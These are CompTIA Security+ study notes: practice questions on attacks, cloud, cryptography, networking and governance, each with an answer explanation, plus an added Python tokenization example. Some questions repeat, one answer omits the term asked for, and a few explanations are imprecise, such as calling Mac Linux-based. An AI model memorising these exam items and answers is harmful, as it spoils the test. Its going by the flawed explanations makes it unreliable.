All comptia wrong

1. A user answers a phone call from what they think is a trusted organization. The caller attempts to
get the individual to enter account details via the phone. It turns out the caller ID was fake.
What type of exploit is this?
Vishing, also known as voice phishing, is an attack in which the attacker uses a fake caller ID to appear as
a trusted organization and attempts to get an individual to enter account details via the phone.
Pharming redirects victims to a bogus website, even if the user correctly entered the intended site. To
accomplish this, the attacker employs another attack, such as DNS cache poisoning.
Phishing is an attempt to acquire sensitive information by masquerading as a trustworthy entity via
electronic communication, usually an email.
2. An attacker wants to perform brute force attacks against the Windows-based SAM file and
Linux-based /etc/passwd file. What term is commonly used for these types of attacks?
The Windows-based Security Account Manager (SAM) file and the /etc/shadow file for Linux-based
systems both contain passwords. These are extremely popular targets for offline brute force attacks.
3. What can cause null pointer errors in which an application dereferences a pointer that it expects
to be valid but is really null, resulting in a system crash?
A race condition, which occurs when a system or device tries to perform two or more operations at the
same time, can cause null pointer errors in which an application dereferences a pointer that it expects to
be valid but is really null, resulting in a system crash.
4. A developer writes a piece of code to provide compatibility for an incompatible device driver.
What is the name of the piece of code the developer has written?
In the case of incompatible device drivers, a developer can either write a shim (a piece of code between
two components that is capable of intercepting calls) to provide compatibility or rework the existing
driver through refactoring. Shimming can also be used as a sophisticated hack. After an attacker installs
a shim and calls are intercepted, the shim can handle the operation, make changes, and even
redirect the call.
5. Aiysha is receiving unsolicited photos and messages on her Bluetooth-enabled device. What is
she the victim of?
Aiysha is the victim of Bluejacking. Bluejacking involves the receipt of unsolicited photos or messages
from a nearby device to another Bluetooth-enabled device, such as a smartphone. Bluesnarfing is
associated with dangerous attacks that can expose or alter a user’s information, whereas Bluejacking is
simply sending unsolicited messages to a Bluetooth device.
6. An attacker sends a deauthentication frame to a wireless access point (WAP) from a spoofed
user’s MAC address. The attacker’s goal is to deny service between the user and the access
point and then get the user to connect to an evil twin so the attacker can capture the user’s
packets and credentials. What type of attack is this?
In a disassociation attack, the attacker disassociates the user from the authenticating wireless access
point and then carries out another attack to attain the user’s valid credentials. A main purpose of this
attack is to get the user to connect to an evil twin access point so the attacker can steal the user’s
credentials or data.
7. What deception technology is used to make a honeypot look as enticing as possible to an
attacker?
Deception technologies such as fake telemetry are used to lure attackers to honeypots and honeynets.
For example, a honeypot may be configured to look like a regular system in full operation with user
logins, running services, and the like.
8. Which of the following is a proactive approach to finding an attacker before alerts are triggered?
Threat hunting is a proactive approach to finding an attacker before alerts are triggered. A threat hunter
is looking to disrupt the attacker during any phase of the cyber kill chain.
9. Which of the following best describes SaaS?
Software as a service (SaaS) involves the delivery of a licensed application to customers over the
Internet for use as a service on demand.
10. What allows for the connection of on-premises networks to cloud-hosted networks?
An infrastructure as a service (IaaS) transit gateway allows for the connection of on-premises networks
to cloud-hosted networks. Demilitarized zone is incorrect.
11. Which cloud deployment model is the best choice when an organization requires scalability,
wants reduced costs, lacks in-house administrative personnel, and has a high-maintenance,
distributed network?
The advantages of using a public cloud include lower infrastructure, maintenance, and administrative
costs; greater hardware efficiency; reduced implementation time; and availability of short-term usage.
12. Which of the following is much like a power strip that distributes power to critical equipment?
For a home office user, a managed power distribution unit (PDU) is much like a power strip. For data
centers, however, PDUs distribute power to critical equipment. Many PDUs have advanced functions to
improve the power quality and provide load balancing as well as remote monitoring.
13. Which statement is NOT true regarding SCADA and ICS?
SCADA is a subset of ICS. An ICS is managed via a SCADA system that provides a Human Machine
Interface (HMI) for operators to monitor the status of a system. In addressing SCADA security concerns,
one of the first lines of defense against attacks is to implement physical segregation of internal and
external networks to reduce the attack surface by segregating the SCADA network from the corporate
LAN. By establishing an electronic security perimeter, it is possible to further segregate a SCADA LAN
from the field device network containing the RTUs and PLCs. A targeted terrorist attack against an ICS
poses a threat to the infrastructure. Ideally, two separate security and IT groups should manage the
network infrastructure and the ICS or SCADA network.
14. Denise needs to install network cabling between the server room ceiling and the floor of the
building’s next level. What type of cable must she use to comply with fire codes?
The plenum is the space between the ceiling and the floor of a building’s next level. It is commonly
used to run network cables. The cables in this part of a building must be plenum grade to comply with
fire codes. The outer casing of this type of cable is more fire resistant than in regular twisted-pair cable.
15. Richard wants to use public key cryptography to send an encrypted message to Racheal. What
key does he need to use to encrypt the message?
Richard needs to use Racheal’s public key to encrypt the message. The other answers are incorrect.
Racheal will then read the message, using her private key. Richard could sign the message using his
private key, and Racheal could use his public key to ensure that his signature is valid.
16. Gonzalo wants to enable a security technology for essential Windows programs and services
that can prevent security threats from executing code on his system. What built-in security
technology should he enable?
Data Execution Prevention (DEP) is a security technology that can prevent security threats from
executing code on a system. DEP works by preventing malware from executing in memory space that is
reserved for operating system processes, programs, and services.
17. Fay, a game developer, is using a white-box software testing process for detecting bugs that
takes a thorough approach to bug detection in the early stages of program development. What
type of testing process is she using?
The idea behind static analysis is to take a thorough approach to bug detection in the early stages of
program development. It is a method used to debug source code against other code before it is actually
run.
18. Wilfred needs an all-in-one appliance that includes security-related functions such as spam
filtering, content filtering, and antivirus protection. Which of the following would suit his needs?
Unified threat management (UTM) security appliances contain varying information security–related
functions, including spam filtering functions and antivirus protection. Other features may include, for
example, email filtering, DLP, content filtering, and application layer firewall. With these devices,
updates are often posted hourly to ensure that the latest definitions are in place. As with any other
appliance that provides multiple functions, UTM is a single point of failure (SPOF).
19. Which of the following does not require browser plug-ins and is considered an easy-to-set-up,
secure remote access solution alternative to using an SSL-based VPN?
An HTML5-based remote access solution does not require browser plug-ins (or worrying about
constantly updating insecure plug-ins) and is considered a secure remote access solution alternative to
using an SSL- or TLS-based VPN. It is an easy-to-use pure browser-based solution that can increase
productivity as well as security.
20. Which is a subnet or segmented zone of the public portion of a company’s IT infrastructure that
grants resource access to partners and resellers that have proper authorization and
authentication?
An extranet is a subnet or segmented zone of the public portion of a company’s IT infrastructure that
grants resource access to partners and resellers that have proper authorization and authentication. This
type of arrangement is commonly used in business-to-business relationships. An extranet can open an
organization to liability, so care must be taken to properly configure VPNs and firewalls to strictly
enforce security policies.
21. Which NAC solution is implemented through Active Directory or an IPS solution and verifies that
end devices comply with the access policy?
Agentless network access control (NAC) solutions are mainly implemented through embedded code in
an Active Directory domain controller. The NAC code verifies that the end device complies with the
access policy when a user joins the domain, logs on to, or logs out of the domain. Another instance in
which an agentless solution is deployed is through an intrusion prevention system (IPS).
22. Ling just purchased and installed a new SOHO router, complete with WPA3. What does WPA3
use to prevent offline password attacks?
WPA3 helps prevent offline password attacks by using Simultaneous Authentication of Equals (SAE).
This allows users to choose easier-to-remember passwords and, through forward secrecy, does not
compromise traffic already transmitted even if the password becomes compromised.
23. Which of the following can help you identify unusual activity based on regular review of all
accounts and then disable and remove any unneeded credentials?
With a baseline, you can identify unusual activity based on regular review of all accounts (including
“permanent” machine and service accounts) and then disable and remove any unneeded credentials.
24. What should you use to ensure that the processes for user account provisioning, life cycle
management, and termination are followed and enforced?
The purpose of continuous monitoring is to ensure that the processes for user account provisioning, life
cycle management, and termination are followed and enforced. Continuous monitoring begins with
knowing what user account activity should be present. Continuously monitoring user access enables you
to detect unauthorized access from attackers using system backdoors and to avert widescale incidents.
25. A client sends its authentication details to a key distribution center. What authentication
protocol is being implemented?
With Kerberos authentication, a client sends its authentication details not to the target server but to a
key distribution center (KDC).
26. Ingrid needs to troubleshoot DNS servers and resolve name resolution issues. What command-line
utilities should she use?
nslookup and dig can be used to troubleshoot DNS servers and resolve name resolution issues by
querying a DNS server to check whether the correct information is in the zone database. nslookup is
used on Windows-based systems; dig, which stands for Domain Information Groper, is used on Mac and
other Linux-based systems.
27. Andrea suspects that a file is infected with malware. What sandboxed malware analysis tool can
she place the file in to get a report detailing the file’s behavior?
Cuckoo is a malware analysis tool. Essentially, you provide Cuckoo with a file, and it returns results
indicating what the file did when it was executed in an isolated sandboxed environment.
28. What is the framework that Lockheed Martin developed to help defend its networks based on
the actions that an attacker takes?
Lockheed Martin developed a framework to help defend its networks based on the chain of actions that
an attacker takes from beginning to end. This model, which has since been adopted by the security
industry, is known as the cyber kill chain.
29. Frederica would like to use an alternative to NetFlow. She needs a network monitoring tool that
samples packets and provides analysis to identify unauthorized network activity and investigate
DDoS attacks. What should she use?
An alternative to NetFlow is sFlow (short for sampled flow), which is also used for network monitoring.
sFlow samples packets and provides analysis to identify unauthorized network activity and investigate
DDoS attacks.
30. What is based on a NetFlow implementation and serves as an industry standard for the export
of flow information from network devices such as routers?
IPFIX (Internet Protocol Flow Information Export) is based on a NetFlow implementation and serves as
an industry standard for the export of flow information from network devices. It is an Internet
Engineering Task Force (IETF) protocol created out of the need to facilitate measurement, billing, and
accounting services.
31. Alice is reading a document describing what steps to take during and after specific types of
cybersecurity attacks against the company. What is she reading?
A playbook describes manual orchestration of incident response. For example, each specific incident
and threat has its own playbook. As a result, the response that an organization takes is formalized in a
step-by-step procedure.
32. The forensics team has collected malware signatures, IP addresses, domain names, and file hash
values. What is the term for these components or other evidence that point to a security
breach?
Indicators of compromise (IOC) are evidence or components that point to a security breach or event.
IOC can include items such as malware signatures, IP addresses, domain names, and file hash values.
ISACs is incorrect.
33. Of the following, which can most easily be thought of as a very large set of precomputed hash
values for every possible combination of characters that is able to reverse cryptographic hash
functions?
A rainbow table can most easily be thought of as a very large set of precomputed hash values for every
possible combination of characters that is able to reverse cryptographic hash functions. If an attacker
has enough resources to store an entire rainbow table in memory, a successful attack on the hashed
passwords can occur with great efficiency.
34. An attacker wants to perform brute force attacks against the Windows-based SAM file and
Linux-based /etc/passwd file. What term is commonly used for these types of attacks?
Offline attack. The Windows-based Security Account Manager (SAM) file and the /etc/shadow file for
Linux-based systems both contain passwords. These are extremely popular targets for offline brute force
attacks. Online is incorrect.
35. Which control type includes organizational culture and physical controls that form the outer line
of defense against direct access to data, such as protecting backup media and paying attention
to facility design details?
Operational controls include organizational culture and physical controls that form the outer line of
defense against direct access to data, such as protecting backup media; securing output and mobile file
storage devices; and paying attention to facility design details, including layout, doors, guards, locks, and
surveillance systems. Technical controls are security controls that are executed by technical systems.
Technical controls include logical access control systems, security systems, encryption, and data
classification solutions. Managerial controls (or administrative controls) include business and
organizational processes and procedures, such as security policies and procedures, personnel
background checks, security awareness training, and formal change-management procedures. The
attribute-based access control (ABAC) authorization process is determined by evaluating rules and
policies against attributes associated with an entity, such as the subject, object, operation, or
environment condition.
36. Which cloud service model delivers the entire computer infrastructure in a hosted service model
over the Internet?
Infrastructure as a service (IaaS) involves delivering the computer infrastructure in a hosted service
model over the Internet. This method of cloud computing allows the client to outsource everything that
would normally be found in a typical IT department: Data center space, servers, networking equipment,
and software can all be purchased as services. SaaS is incorrect. Software as a service (SaaS) involves
delivering a licensed application to customers over the Web for use as a service on demand. A SaaS
vendor hosts an application and allows a customer to use the application, usually for a set subscription
period, after which the application becomes inactive if not renewed. PaaS is incorrect. Platform as a
service (PaaS) involves delivering a platform to develop and manage applications over the Internet,
without downloads or installation. XaaS is incorrect. IaaS, PaaS, SaaS, and so on are collectively known
as XaaS, or anything as a service. This term covers the wide variety of products and services that may be
implemented as services over the Internet.
37. Which of the following is a black-box software-testing process in which semirandom data is
injected into a program or protocol stack to detect bugs?
Fuzzing is a black-box software-testing process in which semirandom data is injected into a program or
protocol stack to detect bugs. Fuzzing is based on the assumption that every program has bugs. Static
analysis is incorrect because static analysis is a white-box software testing process for detecting bugs.
The idea behind static analysis is to take a thorough approach to bug detection in the early stages of
program development. Stress testing is incorrect. Stress testing tests how much stress an application or
a program can withstand before it breaks. Stress testing uses methods to overload the existing
resources in an attempt to break the application. The primary purpose of stress testing is to assess the
behavior of the application beyond normal conditions. Sandboxing is incorrect. Sandboxing allows
programs and processes to be run in an isolated environment to limit access to files and the host
system.
38. Which type of key is designed to be used for a single transaction or session?
An ephemeral key is designed to be used for a single transaction or session. The term ephemeral is
increasingly being used in computer technology; it describes something of a temporary or short
duration. It refers to the use of keys as well as compute systems themselves and communication ports.
Static is incorrect because static keys are designed for long-term use. KDF is incorrect because in reliable
cryptographic systems, the password is used as an input to a key derivation function (KDF), which is used
to derive the actual key based on the password as just the origin point. Stretched is incorrect. Key
stretching runs a password through an algorithm to produce an enhanced key, which is usually at least
128 bits long.
39. Your large Canadian enterprise organization collects, uses, stores, and processes personal
information and is about to be audited. What law should you be most concerned with?
The Personal Information Protection and Electronic Documents Act (PIPEDA) is a Canadian law that
governs the collection and use of personal information. GDPR is incorrect because the General Data
Protection Regulation (GDPR) strengthens and unifies data protection for individuals within the
European Union (EU). Privacy Rule and HIPAA are incorrect because in the United States, the Health
Insurance Portability and Accountability Act (HIPAA) and its Privacy Rule regulate the use and disclosure
of private health information (PHI) for organizations.
40. What type of control is used when the original control becomes unavailable?
Compensating controls are alternate controls that are intended to reduce the risk of an existing or
potential control weakness. They can include audit trails and transaction logs that someone in a higher
position reviews. Compensating controls are used when the original controls become unavailable. For
example, a backup generator is considered a compensating control. Preventive controls attempt to
prevent unwanted events by inhibiting the free use of computing resources. Preventive controls are
often hard for users to accept because they restrict free use of resources. Detective controls attempt to
identify unwanted events after they have occurred. Common technical detective controls include audit
trails, intrusion detection systems, system monitoring, checksums, and anti-malware. Corrective
controls are reactive and provide measures to reduce harmful effects or restore the system that is being
affected. Examples of corrective controls include operating system upgrades, data backup restoration,
vulnerability mitigation, and anti-malware.
41. An administrator has created the credentials on the database that an application will use and
stored the credentials in the secrets management system as the named secret App-DB-Secret.
Which statement best describes what is happening in step 3 in this illustration?
In order to access the database in the example, the application makes a call to the secrets manager for
the named secret (App-DB-Secret). “The secrets manager is managing the task of rotating the secrets
and programmatically managing retrieval based on API calls” is close but is not the best answer here. In
the example illustrated here, steps 1 and 2 aren’t subsequently needed. The secrets manager can manage
the task of rotating the secrets and programmatically managing retrieval based on API calls. “The secrets
management system decrypts App-DB-Secret and securely transmits the credentials to the app by using
transport encryption” is incorrect as this represents step 4, where the secrets management system
decrypts the App-DB-Secret and securely transmits the credentials to the application (not the database)
by using transport layer encryption. “The app is using the credential received to access the database” is
incorrect because this represents step 5, where the application uses the credential received to access
the database.
42. Vladimir is having difficulty managing and responding to security threats and alerts on his
corporate network. Which of the following tools would help him best manage this situation?
A security orchestration, automation, and response (SOAR) platform is valuable for incident mitigation
as it automates data gathering and response. Specific technical response techniques can even be
automated for the most severe vulnerabilities and threats, such as automatically patching systems or
making firewall rule configuration changes. DLP is incorrect. Data loss prevention (DLP) is a technical
control that focuses on detecting and preventing data breach and exfiltration. Based on specific DLP
alerts, SOAR can help automate notifications and combine the alert with additional data to understand
the threat. App allow list and app block/deny list are incorrect. Application allow listing explicitly defines
the applications allowed to be run and is useful in preventing users and attackers from executing
unauthorized applications. Application block/deny is generally done to reduce security-related issues,
particularly where bad actors are known. During an incident, an otherwise allowable destination or
application can be blocked or denied.
43. Aisha is running a bare-metal hypervisor where the software runs directly on the hardware
platform, and the guest operating system runs at the second level above the hardware. What
type of hypervisor is she running?
A Type I native hypervisor, or bare-metal hypervisor, is software that runs directly on a hardware
platform. The guest operating system runs at the second level above the hardware. These hardware-bound
virtual machine emulators rely on the real, underlying CPU to execute nonsensitive instructions
at native speed. In hardware virtualization, a guest operating system is run under the control of a host
system, where the guest has been ported to a virtual architecture that is almost like the hardware it is
actually running on. Type II is incorrect. A Type II hypervisor, or hosted hypervisor, is software that runs
in an operating system environment where the guest operating system runs at the third level above the
hardware. A Type II hypervisor runs as an application or a shell on another operating system that is
already running. The following illustration compares Type I and Type II hypervisors. Type III and Type IV
are incorrect because Type III and Type IV are not valid types of hypervisors.
44. Which of the following statements best describes the process of sideloading?
Sideloading is a process by which a user goes around the approved app marketplace and device
settings to install unapproved apps. As with the installation of third-party apps through app stores,
sideloading an app poses a risk to the organization because that app has not been vetted and thus
could introduce malicious software and compromise sensitive corporate data. “A user unlocks a
mobile device in order to move to a different carrier” is incorrect as this describes carrier unlocking. “An
EMM policy is applied to all mobile devices in an enterprise” is incorrect because this describes an
enterprise mobility management (EMM) approach, which might include mobile device management
(MDM), mobile application management (MAM), and identity management. “A device acts as a wireless
access point, and other devices connect to it” is incorrect because this statement describes Wi-Fi Direct.
45. Ingrid needs to troubleshoot DNS servers and resolve name resolution issues. What command-line
utilities should she use?
nslookup and dig can be used to troubleshoot DNS servers and resolve name resolution issues by
querying a DNS server to check whether the correct information is in the zone database. nslookup is
used on Windows-based systems; dig, which stands for Domain Information Groper, is used on Mac and
other Linux-based systems. netstat and nbtstat are incorrect. The netstat utility displays all the ports on
which the computer is listening and is useful for quickly determining active connections. It can also
display the routing table and per-protocol statistics. nbtstat is a diagnostic tool for NetBIOS over TCP/IP
that is primarily designed to help troubleshoot NetBIOS name resolution problems in Windows
operating systems.
46. Which of the following was established to promote industry-specific sharing of threat
intelligence?
Information Sharing and Analysis Centers (ISACs) promote industry-specific sharing of threat
intelligence. The National Council of ISACs lists more than 20 member ISACs. These include multiple
industries, such as automotive, aviation, elections infrastructure, and real estate.
47. Which of the following best describes a bug bounty program?
A bug bounty program is a formalized program to identify the bugs that lead to a vulnerability or an
exploit. While bug bounties can be public or private, they have gained widespread appeal as they are
often open to the public for externally facing applications and services delivered from the web. The
company running such a program is free to set not just its own terms but also the dollar amount to be
paid. The participants in a bug bounty program also have no understanding of the inner workings of the
systems, which are usually unknown environments (black boxes). “A bug bounty program is an informal
program in which the rules of engagement are not well defined” is incorrect because, like a
penetration test, a bug bounty program is formal and well defined. Governance, terms, and the rules of
engagement are critical and must be made very clear to those who might want to participate.
48. What two important standards does AIS, an initiative from the U.S. Department of
Homeland Security (DHS) that enables the exchange of cybersecurity threat indicators, use?
Automated Indicator Sharing (AIS) is an initiative from the U.S. Department of Homeland
Security (DHS) that uses Trusted Automated eXchange of Indicator Information (TAXII), which is a
specification for machine-to-machine communications that allows organizations to share security
information with others, as desired, and Structured Threat Information eXpression (STIX), which is a
standardized and structured language representing threat information in a flexible, automatable, and
easy-to-use manner. RFCs is incorrect. Requests for comments (RFCs) are documents that describe
behaviors, methods, research, or innovations that have to do with technologies and the workings of the
Internet and systems connected to the Internet. File/code repositories is incorrect. Software developers
are increasingly using online code repositories (repos) such as GitHub to collaborate, regardless of
location, and share code. Many of these repositories are publicly available. Aside from ensuring that your
sensitive data isn’t shared publicly, these repos provide opportunities to attain not just open source
code but even code specific to threat research and information gathering.
49. A fellow security analyst asks you about the flow of network traffic. How would you explain
the east–west traffic concept?
East–west traffic refers to network traffic flow between servers within a data center. “Data
transfers between the data center and the outside of the network” is incorrect because this is north–
south traffic. “Network traffic that has zero trust” is incorrect because zero trust is an evolving
framework that is primarily focused on protecting the resources themselves rather than placing trust in
the entire network, for example, and what is already within that perimeter. “Traffic that goes from New
York to Los Angeles” is incorrect because this is simply an invalid statement regarding network traffic in
the given example.
50. Which of the following best describes SaaS?
Software as a service (SaaS) involves the delivery of a licensed application to customers over
the Internet for use as a service on demand. “Involves the delivery of a computing platform, often an
operating system with associated services, over the Internet without downloads or installation” and
“Involves the delivery of computer infrastructure in a hosted service model over the Internet” are
incorrect. Platform as a service (PaaS) involves the delivery of a computing platform, often an operating
system with associated services, over the Internet without downloads or installation. Infrastructure as a
service (IaaS) involves the delivery of computer infrastructure in a hosted service model over the
Internet. “Addresses security requirements such as visibility, data protection, threat protection, and
compliance across public cloud services” is incorrect because cloud access security broker (CASB)
solutions address security requirements such as visibility, data protection, threat protection, and
compliance across public cloud services.
51. You are considering fault-tolerant RAID options for a new company server that will store
critical data. What RAID variant is displayed in the following illustration?
RAID 5 is displayed in this illustration and will fulfill the fault-tolerance requirement described
here. RAID 5 stripes data blocks across all drives and distributes the parity blocks across the drives as
well, so no single drive holds all of the parity; the array survives the loss of any one drive, after which
the missing blocks are rebuilt from the remaining data and parity. RAID 5 requires a minimum of three
drives. RAID 0 is incorrect. RAID 0 implements a striped disk array with no parity and is not fault
tolerant: the data is broken into blocks, each block is written to a separate disk drive, and the loss of
any one disk loses the whole array. Implementing RAID 0 requires a minimum of two disks. RAID 1 is
incorrect. RAID 1, called mirroring (or duplexing when each mirror has its own controller), requires a
minimum of two disks and offers 100% redundancy because all data is written to both disks. RAID 10 is
incorrect. RAID 10 (also called 1+0) combines RAID 1 and RAID 0 by striping across mirrored pairs and
requires a minimum of four drives. A variant exists, called 0+1. Both RAID 1+0 and RAID 0+1 provide
fault tolerance and increased performance.
52. What process is occurring in the steps that follow?
1. A TLS-enabled web server periodically asks the CA’s OCSP responder for the revocation status of its
own certificate.
2. The OCSP responder returns a digitally signed status response that carries a time stamp and a
validity window.
3. The web server “staples” that signed response to its certificate in the TLS handshake when a client
web browser connects.
4. The client web browser verifies the CA’s signature and the time stamp on the stapled response.
This process is known as Online Certificate Status Protocol (OCSP) stapling. Without it, every
browser visiting a high-traffic website would query the CA itself, burdening the CA with an overwhelming
number of certificate status requests (and telling the CA which sites each user visits). OCSP stapling
reduces this load by letting the web server fetch the response once, cache it, and deliver it as part of the
TLS handshake with the client; the client no longer has to contact the CA for that certificate. Because the
response is signed by the CA (or its delegated responder) and is only valid for a short window, the web
server cannot forge a “good” status or keep replaying a stale one. Certificate pinning is incorrect.
Certificate pinning is essentially associating, or “pinning,” a host to its expected public key. This method
extends beyond typical certificate validation to thwart man-in-the-middle attacks. Certificate revocation
is incorrect. Digital certificates can be revoked. Revoking a certificate invalidates a certificate before its
expiration date. Revocation occurs for several reasons. For example, a private key might become
compromised, the private key might be lost, or the identifying credentials might no longer be valid. Root
signing is incorrect. A root signing certificate is usually provided by a recognized CA. Organizations with a
root signing certificate thus can sign for themselves any number of certificates. These certificates, in
turn, will be trusted by those outside the organization because web browsers include, by default, many
trusted certificates for recognized CAs.
53. Which of the following statements regarding certificate formats are true?
Binary-encoded Distinguished Encoding Rules (DER) certificates, typically with a .der (or .cer)
extension, are common on Java platforms. The P7B format, also known as PKCS#7, uses the .p7b or .p7c
file extension and is commonly supported on Windows operating systems and Java Tomcat; it can carry a
certificate chain but never a private key. “PEM is most commonly associated with Windows web servers”
is incorrect. The most common format and extension for certificates is privacy-enhanced mail (PEM),
which is most commonly associated with Apache (and other Unix-style) web servers, not Windows web
servers. The PEM format is a Base64 ASCII-encoded text file between BEGIN and END marker lines, which
makes copying the contents from one document to another simple. “PFX is most commonly associated
with Apache web servers” is incorrect. Extensions for personal information exchange (PFX, the PKCS#12
container format)–encoded certificates include .pfx and .p12. This binary, password-protected format is
common on Windows operating systems, not Apache web servers, for importing and exporting
certificates together with their private keys.
54. U.S. federal agencies are required to follow the NIST Risk Management Framework (RMF).
What more recent framework did NIST release that organizes cybersecurity activities at their highest
level?
NIST relatively recently introduced the NIST Cybersecurity Framework (CSF), which resulted
from a collaboration between the government and the private sector. CSF organizes cybersecurity
activities at their highest levels. These highest levels are called functions and include Identify, Protect,
Detect, Respond, and Recover. (CSF 2.0, released in 2024, adds a sixth function, Govern.) COBIT is
incorrect. Control Objectives for Information and Related Technology (COBIT) is a set of best practices
for IT management. COBIT is most commonly used to attain compliance with the Sarbanes-Oxley Act
(SOX). ISO/IEC 27001 is incorrect. ISO/IEC 27001 is a standard for information security management,
for which organizations may be certified if they meet the requirements. ISO/IEC 27701 is incorrect.
ISO/IEC 27701 extends ISO 27001 with enhancements for privacy in order to establish and maintain
information management systems specific to privacy.
55. Abraham is reading about an IEEE standard for port-based access control. This standard
specifically provides for the encapsulation of EAP over the IEEE family of standards for packet-based
networks and facilitates the use of various authentication methods, such as RADIUS and digital
certificates. What standard is he reading about?
802.1X is an Institute of Electrical and Electronics Engineers (IEEE) standard for port-based
network access control and provides a method for authenticating a device to another system via an
authentication server. 802.1X specifically provides for the encapsulation of Extensible Authentication
Protocol (EAP) over the IEEE family of standards for packet-based networks (EAP over LAN, or EAPOL).
The supplicant (client) speaks EAP to the authenticator (the switch or access point), which relays it,
typically over RADIUS, to the authentication server; this is what lets the same port support various
authentication methods, such as digital certificates (EAP-TLS) and one-time password devices. 802.11 is
incorrect. Don’t confuse 802.1X with 802.11. 802.11 is specific to wireless technology and is the original
IEEE wireless specification. SAML and OASIS are incorrect.
Security Assertion Markup Language (SAML) is an Extensible Markup Language (XML) framework for
creating and exchanging security information between online partners. It is a product of the OASIS
Security Services Technical Committee. Most cloud and software as a service (SaaS) service providers
favor SAML because it provides authentication assertion, attribute assertion, and authorization
assertion.
56. Which of the following prevents malicious website traffic from infecting internal company
resources by allowing users to access only approved websites?
A next-generation secure web gateway (SWG) prevents malicious website traffic from infecting
internal company resources by allowing users to access only approved websites. All other sites are
blocked. Cloud access security brokers (CASBs) along with SWG provide the capability to deliver static
and dynamic access to the management plane of IaaS providers, just as they do any SaaS app.
DevSecOps is automated and continuous process management for continual integration and delivery of
secure applications. Security information and event management (SIEM) ingests, correlates, and
prioritizes events for deeper visibility into anomalous behavior and threat mitigation. A virtual private
cloud (VPC) endpoint allows a VPC to be connected with other services without the need for additional
technologies, such as a VPN connection or an Internet gateway.
57. Which of the following is a small operating system used in embedded systems and IoT
applications that are typically run in an SoC environment?
A real-time operating system (RTOS) is a small operating system used in embedded systems
and IoT applications that are typically run in an SoC environment. MFD is incorrect. A multifunctional
device (MFD) is typically a printer that can also scan, copy, and fax. Enterprise printers and MFDs need
to be included in security policies and protected just like any other network devices. Often security tools
neglect to block access from a printer running old, vulnerable firmware. HVAC is incorrect. Heating,
ventilation, air conditioning (HVAC) devices use embedded systems to efficiently run environmental
systems and reduce wasted energy. Some HVAC monitoring software is not well updated or runs on
older vulnerable versions of software. Zigbee is incorrect. Zigbee is a wireless set of protocols for
wireless personal area networks (WPANs).
58. Which of the following assigns a random surrogate value with no mathematical relationship
and can be reversed by being linked back to the original data?
With tokenization, you assign a random surrogate value (the token) with no mathematical
relationship to the original data. You can reverse it only by linking the token back to the original value in
the token vault, so the vault, not the token, is what must be protected. Outside the system, a token has
no value; it is just meaningless data. Data masking is incorrect. Data masking desensitizes or removes
sensitive or personal data while keeping the data usable: the sensitive portion is substituted with false
data that appears real (for example, everything but the last four digits of a card number). Hashing is
incorrect. Hashing calculates a short, fixed-length digest from a data set of any size (usually an entire
message or an individual transmission unit). The digest is one-way and cannot be reversed; it is
recalculated independently on the receiving end and compared to the submitted value to verify that
the data has not changed. (Verifying the sender’s identity additionally requires a key, as with an HMAC
or a digital signature.) Redaction is incorrect. Redaction is a process of obscuring data by replacing all or
part of the content for security or privacy purposes. When physical documents are redacted, parts of the
text are blacked out; redaction in information systems often uses the asterisk character to obscure data.
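The four techniques side by side, as an added example that is not part of the original study material. It is written in Python with only the standard library; the card number is a constructed sample value and the in-memory vault stands in for a real, access-controlled token store:

```python
import hashlib
import secrets
from typing import Dict

# Constructed sample value (a well-known test card number), not real data.
SAMPLE_PAN = "4111111111111111"


class TokenVault:
    """Minimal tokenization service.

    A token is drawn from a CSPRNG, so it has no mathematical relationship to
    the value it stands for; the only way back is the mapping held inside the
    vault, which is why the vault (not the token) is what must be protected.
    """

    def __init__(self) -> None:
        self._forward: Dict[str, str] = {}  # original value -> token
        self._reverse: Dict[str, str] = {}  # token -> original value

    def tokenize(self, value: str) -> str:
        if value in self._forward:          # same value always yields the same token
            return self._forward[value]
        while True:
            token = secrets.token_hex(8)    # 64 random bits, 16 hex characters
            if token not in self._reverse:  # guard against the (unlikely) repeat
                break
        self._forward[value] = token
        self._reverse[token] = value
        return token

    def detokenize(self, token: str) -> str:
        """Reverse the mapping; raises KeyError for a token this vault never issued."""
        return self._reverse[token]


def mask_pan(pan: str, visible: int = 4) -> str:
    """Data masking: the value stays usable (same length, last digits intact)
    but the sensitive part is replaced with a fixed character."""
    return "*" * (len(pan) - visible) + pan[-visible:]


def hash_value(value: str) -> str:
    """Hashing: a one-way, fixed-length digest. It is not reversible, and for
    low-entropy input such as a card number it is trivially brute-forced, so it
    is an integrity/comparison tool, not a substitute for tokenization."""
    return hashlib.sha256(value.encode()).hexdigest()


def redact(text: str, secret: str) -> str:
    """Redaction: obscure the sensitive content wherever it appears in a document."""
    return text.replace(secret, "[REDACTED]")
```

Note that `hash_value` is deterministic and keyless: anyone with the 16-digit space can regenerate it, which is why hashing a card number is not a way to de-identify it. The token, by contrast, carries no information at all without access to the vault.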
59. Data classification and appropriate data ownership roles are key elements in an
organization’s security policy. Who is responsible for implementing the data classification and security
controls?
A data custodian/steward is responsible for implementing data classification and security
controls, given the classification determined by the data owner. The data custodian is also known as the
data steward. The other answers are incorrect. The data owner is responsible for a specific information
asset. This is often a senior person in a department or division. For example, the vice president of
human resources (HR) could be the data owner for all employee data. The data owner is responsible for
determining the classification level of the data. The data protection officer (DPO) is responsible for legal
compliance with data privacy regulations and manages data protection risk that relates to ensuring the
proper management of personal and protected information. For example, HIPAA requires covered
entities to designate a privacy officer.
60. Bob, a security analyst, has recently discovered a cryptographic method of attack against a
secure hash. What type of attack has he identified?
A birthday attack is a cryptographic method of attack against a secure hash. Rather than trying
to find an input that matches one specific digest, the attacker looks for any two inputs that produce the
same digest, which takes roughly the square root of the brute-force work: about 2^(n/2) hash
computations for an n-bit hash instead of 2^n. It is based on what is known as the birthday paradox.
Downgrade is incorrect because a downgrade attack is often a result of security configurations not being
updated. Often this stems from the desire to maintain backward compatibility. Password spraying is
incorrect. Password spraying is an attack that attempts to access a large number of user accounts with a
very small number of commonly used passwords. Skimming is incorrect because skimming involves
copying data from an ATM or other card by using a specialized terminal and cloning by encoding the
stolen data onto a blank card.
61. Which of the following is a fixed-size input of a random or pseudo-random value that helps
ensure that each message encrypts differently?
An initialization vector (IV) is a fixed-size input of a random or pseudo-random value. In
cryptography, an IV helps ensure that each message is encrypted differently. You would not want the
same message, encrypted with the same key, to have the same resulting cipher text: identical
ciphertexts tell an observer that identical messages were sent, and in stream and counter modes a
reused IV under the same key reuses the keystream and exposes the plaintexts. An IV does not have to
be secret, but it must never be reused with the same key. Symmetric key is incorrect. A symmetric key is
a single cryptographic key used with a secret key (symmetric) algorithm. The symmetric key algorithm
